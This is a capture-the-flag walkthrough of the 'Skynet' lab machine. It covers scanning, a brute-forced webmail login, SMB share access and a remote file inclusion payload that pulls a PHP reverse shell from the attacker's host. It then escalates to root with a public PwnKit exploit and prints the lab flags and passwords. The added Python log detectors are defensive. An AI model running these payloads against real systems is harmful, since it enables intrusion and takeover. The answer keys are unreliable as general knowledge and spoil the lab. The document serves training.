$ nmap -sC -sV <MACHINE_IP>
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 992331bbb1e943b756944cb9e82146c5 (RSA)
| 256 57c07502712d193183dbe4fe679668cf (ECDSA)
|_ 256 46fa4efc10a54f5757d06d54f6c34dfe (ED25519)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Skynet
110/tcp open pop3 Dovecot pop3d
|_pop3-capabilities: AUTH-RESP-CODE SASL PIPELINING UIDL CAPA RESP-CODES TOP
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
143/tcp open imap Dovecot imapd
|_imap-capabilities: IMAP4rev1 post-login more listed have capabilities ID LITERAL+ LOGINDISABLEDA0001 IDLE LOGIN-REFERRALS OK Pre-login ENABLE SASL-IR
445/tcp open netbios-ssn Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP)
Service Info: Host: SKYNET; OS: Linux; CPE: cpe:/o:linux:linux_kernel
Host script results:
|_clock-skew: mean: 1h40m00s, deviation: 2h53m12s, median: 0s
| smb2-time:
| date: 2023-05-07T05:07:19
|_ start_date: N/A
|_nbstat: NetBIOS name: SKYNET, NetBIOS user: <unknown>, NetBIOS MAC: 000000000000 (Xerox)
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-security-mode:
| 311:
|_ Message signing enabled but not required
| smb-os-discovery:
| OS: Windows 6.1 (Samba 4.3.11-Ubuntu)
| Computer name: skynet
| NetBIOS computer name: SKYNET\x00
| Domain name: \x00
| FQDN: skynet
|_ System time: 2023-05-07T00:07:19-05:00
└─$ gobuster dir -u http://10.10.71.82/ -w /usr/share/wordlists/dirbuster/directory-list-1.0.txt
===============================================================
Gobuster v3.5
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://10.10.71.82/
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-1.0.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.5
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/admin (Status: 301) [Size: 310] [--> http://10.10.71.82/admin/]
/ai (Status: 301) [Size: 307] [--> http://10.10.71.82/ai/]
/config (Status: 301) [Size: 311] [--> http://10.10.71.82/config/]
/squirrelmail (Status: 301) [Size: 317] [--> http://10.10.71.82/squirrelmail/]
/css (Status: 301) [Size: 308] [--> http://10.10.71.82/css/]
/js (Status: 301) [Size: 307] [--> http://10.10.71.82/js/]
===============================================================
2023/05/07 11:25:45 Finished
===============================================================
get <FileName>
We found a list of passwords in log1.txt.
So let's use that password file to brute-force the login at /squirrelmail using Burp Suite, with Sniper as the attack type.
We found a redirect to webmail.php, which seems interesting, so copy and paste the password into the login field.
Voila!! We found the password :)
Ans: cyborg007haloterminator
I used Rapid Tables to decrypt the message.
2. We got the password, so let's log in to the /milesdyson share with the username milesdyson and the password we found in the mail: )s{A&2Z=F^n_E.B`
We are in, now let's explore!!
$ smbclient //10.10.71.82/milesdyson -U milesdyson
Password for [WORKGROUP\milesdyson]:
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Tue Sep 17 14:35:47 2019
.. D 0 Wed Sep 18 09:21:03 2019
Improving Deep Neural Networks.pdf N 5743095 Tue Sep 17 14:35:14 2019
Natural Language Processing-Building Sequence Models.pdf N 12927230 Tue Sep 17 14:35:14 2019
Convolutional Neural Networks-CNN.pdf N 19655446 Tue Sep 17 14:35:14 2019
notes D 0 Tue Sep 17 14:48:40 2019
Neural Networks and Deep Learning.pdf N 4304586 Tue Sep 17 14:35:14 2019
Structuring your Machine Learning Project.pdf N 3531427 Tue Sep 17 14:35:14 2019
smb: \> cd notes
smb: \notes\> ls
. D 0 Tue Sep 17 14:48:40 2019
.. D 0 Tue Sep 17 14:35:47 2019
3.01 Search.md N 65601 Tue Sep 17 14:31:29 2019
4.01 Agent-Based Models.md N 5683 Tue Sep 17 14:31:29 2019
2.08 In Practice.md N 7949 Tue Sep 17 14:31:29 2019
0.00 Cover.md N 3114 Tue Sep 17 14:31:29 2019
1.02 Linear Algebra.md N 70314 Tue Sep 17 14:31:29 2019
====> important.txt N 117 Tue Sep 17 14:48:39 2019
6.01 pandas.md N 9221 Tue Sep 17 14:31:29 2019
3.00 Artificial Intelligence.md N 33 Tue Sep 17 14:31:29 2019
2.01 Overview.md N 1165 Tue Sep 17 14:31:29 2019
3.02 Planning.md N 71657 Tue Sep 17 14:31:29 2019
1.04 Probability.md N 62712 Tue Sep 17 14:31:29 2019
2.06 Natural Language Processing.md N 82633 Tue Sep 17 14:31:29 2019
2.00 Machine Learning.md N 26 Tue Sep 17 14:31:29 2019
1.03 Calculus.md N 40779 Tue Sep 17 14:31:29 2019
3.03 Reinforcement Learning.md N 25119 Tue Sep 17 14:31:29 2019
1.08 Probabilistic Graphical Models.md N 81655 Tue Sep 17 14:31:29 2019
1.06 Bayesian Statistics.md N 39554 Tue Sep 17 14:31:29 2019
6.00 Appendices.md N 20 Tue Sep 17 14:31:29 2019
1.01 Functions.md N 7627 Tue Sep 17 14:31:29 2019
2.03 Neural Nets.md N 144726 Tue Sep 17 14:31:29 2019
2.04 Model Selection.md N 33383 Tue Sep 17 14:31:29 2019
2.02 Supervised Learning.md N 94287 Tue Sep 17 14:31:29 2019
4.00 Simulation.md N 20 Tue Sep 17 14:31:29 2019
3.05 In Practice.md N 1123 Tue Sep 17 14:31:29 2019
1.07 Graphs.md N 5110 Tue Sep 17 14:31:29 2019
2.07 Unsupervised Learning.md N 21579 Tue Sep 17 14:31:29 2019
2.05 Bayesian Learning.md N 39443 Tue Sep 17 14:31:29 2019
5.03 Anonymization.md N 2516 Tue Sep 17 14:31:29 2019
5.01 Process.md N 5788 Tue Sep 17 14:31:29 2019
1.09 Optimization.md N 25823 Tue Sep 17 14:31:29 2019
1.05 Statistics.md N 64291 Tue Sep 17 14:31:29 2019
5.02 Visualization.md N 940 Tue Sep 17 14:31:29 2019
5.00 In Practice.md N 21 Tue Sep 17 14:31:29 2019
4.02 Nonlinear Dynamics.md N 44601 Tue Sep 17 14:31:29 2019
1.10 Algorithms.md N 28790 Tue Sep 17 14:31:29 2019
3.04 Filtering.md N 13360 Tue Sep 17 14:31:29 2019
1.00 Foundations.md N 22 Tue Sep 17 14:31:29 2019
9204224 blocks of size 1024. 5819264 blocks available
We found a file called important.txt, which reveals the hidden directory.
Ans: /45kra24zxs28v3yd
Ans: Remote File Inclusion
Now that we have found the hidden directory, let's brute-force further with Gobuster.
gobuster dir -u http://<Machine-IP>/45kra24zxs28v3yd -w <Wordlist-Location>
===============================================================
Gobuster v3.5
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://10.10.223.209/45kra24zxs28v3yd
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-1.0.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.5
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/index.html (Status: 200) [Size: 418]
/administrator (Status: 301) [Size: 333] [--> http://10.10.223.209/45kra24zxs28v3yd/administrator/]
===============================================================
Finished
===============================================================
On googling about this, we found a File Inclusion vulnerability.
For this, we can run a simple Python server to serve a reverse shell:
1. Place the reverse shell in your /var/www/html directory or your /home directory with the file name php_reverse_shell.php, and make sure to set your system IP and port 4444 inside the reverse shell file.
2. Serve that directory with a simple Python server.
3. Start a reverse listener using netcat with the port you used in the reverse shell.
4. Now let's execute the below payload:
http://<Machine_IP>/45kra24zxs28v3yd/administrator/alerts/alertConfigField.php?urlConfig=http://<Your-System-IP>/php_reverse_shell.php
We got the reverse shell, so cd /home and cat user.txt.
Ans: 7ce5c2109a40f958099283600a9ae807
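As an added example (not part of the original write-up), here is the defender's view of the inclusion above: a small Python detector run over Apache access-log lines that flags any decoded query-parameter value which is itself a URL or a path traversal, the way `urlConfig` was abused. The log lines and IP addresses are constructed placeholders.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Apache combined-log line: client, timestamp, request line, status.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) \S+" '
    r'(?P<status>\d{3})'
)
# Schemes PHP's include() will fetch or decode when allow_url_include is on.
REMOTE_SCHEME_RE = re.compile(r'^\s*(https?|ftp|php|data|expect)://', re.IGNORECASE)
# Directory traversal in the decoded value (local file inclusion attempts).
TRAVERSAL_RE = re.compile(r'(\.\./|\.\.\\)')

def rfi_hits(lines):
    """Return (client_ip, parameter, value, kind) for every request whose
    query string carries a value that is a remote URL or a traversal path."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not a combined-log line; skip rather than guess
        query = urlsplit(m.group('target')).query
        for key, value in parse_qsl(query, keep_blank_values=True):
            if REMOTE_SCHEME_RE.match(value):
                hits.append((m.group('ip'), key, value, 'remote'))
            elif TRAVERSAL_RE.search(value):
                hits.append((m.group('ip'), key, value, 'traversal'))
    return hits

# Constructed sample lines; 10.0.0.9 stands in for the attacker's host.
SAMPLE_LOG = [
    '10.0.0.5 - - [07/May/2023:11:30:01 -0500] "GET /45kra24zxs28v3yd/index.html HTTP/1.1" 200 418',
    '10.0.0.9 - - [07/May/2023:11:31:12 -0500] "GET /45kra24zxs28v3yd/administrator/alerts/'
    'alertConfigField.php?urlConfig=http%3A%2F%2F10.0.0.9%2Fphp_reverse_shell.php HTTP/1.1" 200 1203',
    '10.0.0.9 - - [07/May/2023:11:31:15 -0500] "GET /45kra24zxs28v3yd/administrator/alerts/'
    'alertConfigField.php?urlConfig=../../../../etc/passwd HTTP/1.1" 200 2950',
    '10.0.0.7 - - [07/May/2023:11:32:40 -0500] "GET /squirrelmail/src/redirect.php HTTP/1.1" 302 0',
]

if __name__ == '__main__':
    for ip, key, value, kind in rfi_hits(SAMPLE_LOG):
        print(f'{ip}: {kind} inclusion attempt via {key}={value!r}')
```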
First let's make the terminal interactive using Python!
python3 -c "import pty;pty.spawn('/bin/bash')"
/var/www/html
or your /home
directory
3. Now let's change the file permission, then execute the file!!
Let's download the files and move them to the target machine!!
git clone https://github.com/berdav/CVE-2021-4034
zip exploit CVE-2021-4034 -r
Move the zip file to /var/www/html or /home, then download it on the target machine using wget.
cd CVE-2021-4034
make
./cve-2021-4034
cd /root
cat root.txt
Ans: 3f0372db24753accc7179a282cd6a949
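As an added example (not part of the original write-up), the defensive counterpart to the pkexec step above: a Python check that reports whether pkexec is still set-user-ID root (removing the bit with chmod 0755 is the published stop-gap when polkit cannot be patched), plus a filter for the two auth-log messages pkexec emits under the conditions the public exploit creates, worded as in the Qualys advisory for CVE-2021-4034 and matched in both spellings. The pkexec path and the auth-log lines are assumptions and constructed samples.

```python
import os
import re
import stat

PKEXEC = '/usr/bin/pkexec'  # assumed default path on Debian/Ubuntu

def setuid_root(st_mode, st_uid):
    """True when the set-user-ID bit is present and the owner is root,
    the combination CVE-2021-4034 needs in pkexec."""
    return bool(st_mode & stat.S_ISUID) and st_uid == 0

def pkexec_status(path=PKEXEC):
    """Return 'missing', 'setuid-root' or 'not-setuid' for the binary at path."""
    try:
        st = os.stat(path)
    except FileNotFoundError:
        return 'missing'
    return 'setuid-root' if setuid_root(st.st_mode, st.st_uid) else 'not-setuid'

# pkexec logs these when SHELL is not in /etc/shells or an environment
# variable carries unsafe content; the upstream source misspells "suspicious".
PWNKIT_RE = re.compile(
    r'pkexec.*(SHELL variable was not found|contains (suscipious|suspicious) content)',
    re.IGNORECASE)

def pwnkit_indicators(lines):
    """Return the auth-log lines that carry the exploitation messages."""
    return [line for line in lines if PWNKIT_RE.search(line)]

# Constructed sample auth.log lines (hostname and PIDs are placeholders).
SAMPLE_AUTH_LOG = [
    'May  7 12:01:03 skynet pkexec[2210]: www-data: The value for the SHELL variable '
    'was not found the /etc/shells file [USER=root] [TTY=unknown] [CWD=/tmp/CVE-2021-4034]',
    'May  7 12:01:03 skynet pkexec[2210]: www-data: The value for environment variable '
    'XAUTHORITY contains suscipious content [USER=root] [TTY=unknown]',
    'May  7 12:02:10 skynet sshd[2290]: Accepted publickey for milesdyson from 10.0.0.7 port 51000 ssh2',
]

if __name__ == '__main__':
    print('pkexec:', pkexec_status())
    for line in pwnkit_indicators(SAMPLE_AUTH_LOG):
        print('PwnKit indicator:', line)
```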